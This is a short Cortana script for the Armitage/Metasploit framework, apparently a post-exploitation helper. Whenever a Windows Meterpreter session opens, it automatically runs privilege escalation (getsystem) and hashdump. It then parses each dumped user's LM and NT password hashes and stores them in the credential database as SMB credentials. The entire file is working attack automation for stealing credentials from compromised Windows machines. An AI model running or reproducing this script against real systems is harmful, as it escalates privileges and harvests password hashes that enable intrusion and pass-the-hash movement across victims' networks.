# Cortana script to discover strange new networks.
# by monstream00
# Step 1. When a session opens, grab its routes.
on session_sync {
	if (-iswinmeterpreter $1) {
		m_cmd($1, "getprivs");
		m_cmd($1, "getsystem");
		m_cmd($1, "getprivs");
		m_cmd($1, "hashdump");
	}
}

#global('%last');

on meterpreter_hashdump {
	#println("========================================================================================================");
	#println("On Meterpreter Hashdump Script Activated!");
	#println("========================================================================================================");
	local('$entry $user $hash $count');
	foreach $entry (split("\n", $3)) {
		if ($entry ismatch '(.*?):\d+:(.*?):(.*?):.*') {
			($user, $fhash, $lhash) = matched();
			$hash = $fhash . ":" . $lhash;
			#sleep(2 * 1000);
			credential_add(session_host($1), 445, $user, $hash, "smb_hash");
			#sleep(2 * 1000);
			$temphoststore = session_host($1);
			println("[*] Dumping $temphoststore session $1 : $user $hash into database!");
			$count += 1;
		}
	}
	#println("[*] Finshed saveing $count hashes on " . session_host($1));
}
